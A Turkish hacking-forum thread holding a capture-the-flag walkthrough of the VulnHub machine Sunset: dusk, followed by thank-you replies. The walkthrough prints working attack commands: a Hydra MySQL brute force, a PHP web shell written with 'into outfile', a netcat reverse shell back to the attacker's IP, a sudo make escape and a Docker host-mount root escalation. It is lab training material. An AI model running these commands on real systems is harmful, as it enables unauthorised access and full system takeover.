THT DUYURU

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm

Seçenekler

Sunset:Dusk Zafiyetli Makinesinin Çözümü//"P4RS

"P4RS - ait Kullanıcı Resmi (Avatar)
Green Team Lideri
Üyelik tarihi:
01/2017
Nereden:
Balkes
Yaş:
18
Mesajlar:
4.559
Konular:
481
Teşekkür (Etti):
1121
Teşekkür (Aldı):
2268
Ticaret:
(0) %
24-12-2019 11:42
#1
Sunset:Dusk Zafiyetli Makinesinin Çözümü//"P4RS
Merhabalar TürkHackTeam ailesi, bugün sizlere Sunset:dusk VulnHub Zafiyetli Makinesinin Çözümünü göstereceğim.




https://www.vulnhub.com/entry/sunset-dusk,404/




Makine İsmi: Sunset: dusk

Yayınlanma Tarihi: 1 Aralık 2019

Yapımcı: whitecr0wz

Seri: sunset

Açıklama: Hedefde ki user.txt ve root.txt dosyalarında ki flag'ı almak

Dosya Boyutu: 1.1 GB

İşletim Sistemi: Linux

Zorluk Derecesi: Kolay




İlk olarak makinenin IP adresini öğrenmek için
Kod:
sudo netdiscover
yazalım.



Makinenin IP adresini öğrendik.



Şimdi açık portları öğrenmek ve yolumuzu çizmek için NMAP taraması yapacağız. Terminale
Kod:
nmap -A IP_adresi
yazalım.

Burada önemli nokta mysql'in açık olması





80 portu açıktı ve bir site olduğunu anladık, siteye girdiğimiz de sitede pekte bir şey bulamadık.



Ardından Hydra aracı ile MySQL'e Brute saldırı yapacağız. Bunun için
Kod:
hydra -L kullanıcı_adı_listesi -P şifre_listesi IP_adresi mysql
yazalım. Gördüğünüz gibi bilgiyi aldık kullanıcı adı: root şifre: password



Ardından sitenin 8080 portuna gittim ve /var/tmp olduğumuzu söylüyor bize. MySQL'i kullanarak buraya veri atacağız birazdan.



MySQL'e giriş yapmak için
Kod:
mysql -h IP_adresi -u root -p
yazalım ve şifreyi girelim. Ardından https://github.com/pentestmonkey/php...erse-shell.php buraya giderek kodları kopyalayıp bir php dosyası oluşturalım. Bu kodlarda biraz aşağıda CHANGE THİS kısımları var.
Kod:
$VERSION = "1.0";
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
burada $ip = kendi makineninizin IP adresinizi yazınız.
Ardından MySQL'e
Kod:
select "<?php system($_GET['cmd']); ?>" into outfile '/var/tmp/p4rs.php' ;
p4rs.php dosyasını ben kendim oluşturdum siz başka isimde de oluşturabilirsiniz.



Tarayıcıya IP_adresi:8080 yazdığımızda kendi oluşturduğumuz dosyamız içeride gördüğünüz gibi.



Tarayıcıya gelerek
Kod:
http://IP_adresi:8080/p4rs.php?cmd=id
yazdığımızda RCE komutu gördüğünüz gibi sistemde çalıştı.



Şimdi terminali açalım ve portu dinlemeye alalım
Kod:
nc -lvp 1234
. Ardından tarayıcıya da
Kod:
http://IP_adresi:8080/p4rs.php?cmd=nc -e /bin/bash Kendi_IP_adresiniz 1234
yazalım ve içeri girelim.



Bağlantı kuruldu ve içeri girdik, kabuk yükseltmesi için
Kod:
python -c "import pty;pty.spawn('/bin/bash')"
yazalım. Ardından home dizinine girip dusk dizinine girelim. Gördüğünüz gibi orada user.txt dosyasını bulduk yazdıralım ve ilk bayrağı alalım.



Sudo haklarını öğrenmek için sudo -l yazdık. Şimdi exploit ederek içeri girmek için
Kod:
COMMAND='/bin/sh'
sudo -u dusk make -s --eval=$'x:\n\t-'"$COMMAND"
yazdık. groups yazdığımızda docker grubunda olduğunu öğrendik.



Docker'ı kullanarak yapacağız ancak fotoğrafta gözükmemiş orada. -v parametresi istediğimiz bir şeyi oluşturmak için -i ve -t kabuk moduna girmek için kullanılır.

Kod:
docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
yazdık ve birkaç veri oluşturdu, içeri girdik.
id dediğimiz de root yetkisinde olduğumuzu gördük. Direk
Kod:
cd /root
yazdık ve root dizinine girdik.
Kod:
ls
yazdığımızda root.txt dosyası olduğunu gördük ve yazdırdık.





Gördüğünüz gibi iki bayrağı da aldık





Konum bu kadardı arkadaşlar, başka bir konumda görüşmek üzere sağlıcakla...

Xowly - ait Kullanıcı Resmi (Avatar)
Green Team
Üyelik tarihi:
06/2019
Nereden:
ғ˦
Mesajlar:
379
Konular:
69
Teşekkür (Etti):
359
Teşekkür (Aldı):
237
Ticaret:
(0) %
24-12-2019 16:55
#2
Cevap: Sunset:Dusk Zafiyetli Makinesinin Çözümü//"P4RS
Ellerine sağlık yeni düzeni sevdim, devamını bekliyorum
Noah Parker - ait Kullanıcı Resmi (Avatar)
İstihbarat Tim
Üyelik tarihi:
08/2019
Nereden:
TR/AZ
Mesajlar:
344
Konular:
73
Teşekkür (Etti):
439
Teşekkür (Aldı):
151
Ticaret:
(0) %
24-12-2019 17:04
#3
Cevap: Sunset:Dusk Zafiyetli Makinesinin Çözümü//"P4RS
Ellerinize sağlık hocam böyle zaafiyetli makine çözüm konuları hoş oluyor
Nova Design - ait Kullanıcı Resmi (Avatar)
Deneyimli Grafiker
Üyelik tarihi:
06/2016
Nereden:
T U R A N
Yaş:
30
Mesajlar:
1.667
Konular:
265
Teşekkür (Etti):
725
Teşekkür (Aldı):
815
Ticaret:
(0) %
24-12-2019 19:01
#4
Cevap: Sunset:Dusk Zafiyetli Makinesinin Çözümü//"P4RS
Elinize Sağlık. Güzel konu.
---------------------

╔═════════════╗
Youtube Kanalım
Twitter Hesabım
Telegram
╚═════════════╝
۩ ĸaraтay creaтιve ۩

"P4RS - ait Kullanıcı Resmi (Avatar)
Green Team Lideri
Üyelik tarihi:
01/2017
Nereden:
Balkes
Yaş:
18
Mesajlar:
4.559
Konular:
481
Teşekkür (Etti):
1121
Teşekkür (Aldı):
2268
Ticaret:
(0) %
24-12-2019 22:15
#5
Cevap: Sunset:Dusk Zafiyetli Makinesinin Çözümü//"P4RS
Alıntı:
Xowly´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık yeni düzeni sevdim, devamını bekliyorum
Alıntı:
Noah Parker´isimli üyeden Alıntı Mesajı göster
Ellerinize sağlık hocam böyle zaafiyetli makine çözüm konuları hoş oluyor
Alıntı:
dcrean´isimli üyeden Alıntı Mesajı göster
Elinize Sağlık. Güzel konu.
Beğenmenize sevindim arkadaşlar
ZoRRoKiN - ait Kullanıcı Resmi (Avatar)
Emektar
Üyelik tarihi:
08/2005
Nereden:
WORLD
Mesajlar:
2.131
Konular:
800
Teşekkür (Etti):
460
Teşekkür (Aldı):
6537
Ticaret:
(1) %
25-12-2019 10:14
#6
Cevap: Sunset:Dusk Zafiyetli Makinesinin Çözümü//"P4RS
Güzel paylaşım.
--------------------- Ne fark eder ki...
"P4RS Teşekkür etti.
"P4RS - ait Kullanıcı Resmi (Avatar)
Green Team Lideri
Üyelik tarihi:
01/2017
Nereden:
Balkes
Yaş:
18
Mesajlar:
4.559
Konular:
481
Teşekkür (Etti):
1121
Teşekkür (Aldı):
2268
Ticaret:
(0) %
25-12-2019 19:20
#7
Cevap: Sunset:Dusk Zafiyetli Makinesinin Çözümü//"P4RS
Alıntı:
ZoRRoKiN´isimli üyeden Alıntı Mesajı göster
Güzel paylaşım.
Beğenmenize çok sevindim hocam

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler